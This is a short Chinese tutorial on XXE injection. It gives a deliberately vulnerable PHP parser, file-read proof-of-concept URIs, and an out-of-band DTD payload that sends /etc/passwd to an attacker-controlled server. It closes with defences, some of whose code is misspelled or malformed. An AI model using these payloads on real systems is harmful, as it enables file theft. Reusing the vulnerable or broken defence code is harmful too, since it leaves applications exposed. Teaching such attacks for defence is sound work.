web基础漏洞-xxe
XXE漏洞利用 – 任意文件读取_哔哩哔哩_bilibili
1、介绍
xxe漏洞全称XML External Entity Injection即外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起DOS攻击等危害。
xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可以上传恶意xml文件。而php、java等网站代码读取xml文件时,会根据xml中外部引入实体路径设置发起请求。
由xml导致的漏洞,一般是造成任意文件读取,可以分为有回显和无回显
2、测试代码
<?php
$xml=file_get_contents("php://input");
$data=simplexml_load_string($xml);
echo "<pre>";
print_r($data);//注释掉该语句即为无回显的情况
?>3、poc
file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php- file协议不能直接读取php文件,会报错
4、无回显
实际上是将本地数据读取后作为参数拼接到请求中,发送给攻击者设置的dtd服务器。
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!Entity % p2 "<!ENTITY e1 SYSTEM 'http://192.168.1.103/test.php?con=%p1;'>">
%p2;5、xxe漏洞消亡原因
libxml2.9.0以后,默认不解析外部实体,导致xxe漏洞主机消亡。
6、xxe防御
(1)使用开发语言提供的禁用外部实体方法
//php
libxml_disable_entity_loader(true);
//java
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpanEntityReferences(false);
//python
from lxml import etree
xmlData = etree.parse(xmlSource.etree.XMLParser(resolve_entities=False))(2)过滤用户提交的xml数据
关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC
